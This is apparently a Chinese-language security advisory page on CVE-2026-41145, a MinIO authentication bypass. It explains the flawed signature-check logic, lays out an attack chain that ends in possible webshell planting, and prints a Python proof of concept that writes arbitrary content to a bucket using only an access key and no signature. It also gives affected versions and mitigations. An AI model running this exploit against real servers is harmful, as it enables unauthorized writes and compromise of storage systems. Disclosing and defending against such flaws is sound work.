IPBUF安全漏洞报告
English
CVE-2026-41145 CVSS 8.2 高危

CVE-2026-41145 MinIO认证绕过漏洞

披露日期: 2026-04-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41145
漏洞类型
认证绕过
CVSS评分
8.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
MinIO

相关标签

认证绕过MinIOCVE-2026-41145对象存储高危漏洞

漏洞概述

MinIO存在认证绕过漏洞,攻击者仅需拥有有效的Access Key即可利用STREAMING-UNSIGNED-PAYLOAD-TRAILER路径绕过签名验证,向任意存储桶写入恶意对象,无需Secret Key。

技术细节

该漏洞源于MinIO对`STREAMING-UNSIGNED-PAYLOAD-TRAILER`的处理逻辑缺陷。`PutObjectHandler`仅依据请求中是否存在`Authorization`头来决定是否进行签名验证,而凭证提取函数`isPutActionAllowed`同时信任`Authorization`头和`X-Amz-Credential`查询参数。攻击者构造请求时,故意省略`Authorization`头,仅通过查询字符串提供凭证。这导致签名验证逻辑被绕过,但系统仍基于查询参数中的凭证赋予相应权限,从而实现未授权的数据写入。

攻击链分析

STEP 1
信息收集
攻击者识别目标MinIO服务,并获取一个有效的Access Key(如默认的minioadmin或具有写权限的密钥)。
STEP 2
构造攻击请求
攻击者构造HTTP PUT请求,包含`X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER`头部,并将凭证通过`X-Amz-Credential`查询参数传递,故意移除`Authorization`头部。
STEP 3
绕过验证
服务端因缺少`Authorization`头部而跳过签名验证,但解析查询参数中的凭证并赋予相应权限。
STEP 4
写入恶意对象
攻击者成功向任意目标Bucket上传文件,可能覆盖关键文件或植入Webshell。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://minio-server:9000/bucket-name/testfile.txt" access_key = "minioadmin" # Valid access key # Exploit: Use query params for creds, omit Authorization header # Use the vulnerable trailer mode headers = { "X-Amz-Content-Sha256": "STREAMING-UNSIGNED-PAYLOAD-TRAILER", "Content-Type": "application/octet-stream" } params = { "X-Amz-Algorithm": "AWS4-HMAC-SHA256", "X-Amz-Credential": f"{access_key}/20260422/us-east-1/s3/aws4_request", "X-Amz-Date": "20260422T000000Z", "X-Amz-SignedHeaders": "host" # Note: No X-Amz-Signature is required due to the bypass } data = b"Malicious content written via auth bypass" response = requests.put(target_url, headers=headers, params=params, data=data) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}")

影响范围

MinIO RELEASE.2023-05-18T00-05-36Z 至 RELEASE.2026-04-11T03-20-12Z 之前

防御指南

临时缓解措施
如果无法立即升级,建议在反向代理或WAF层面拒绝所有包含`X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER`的请求。同时,严格限制用户对`s3:PutObject`的写入权限,避免向不可信用户开放写入能力。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表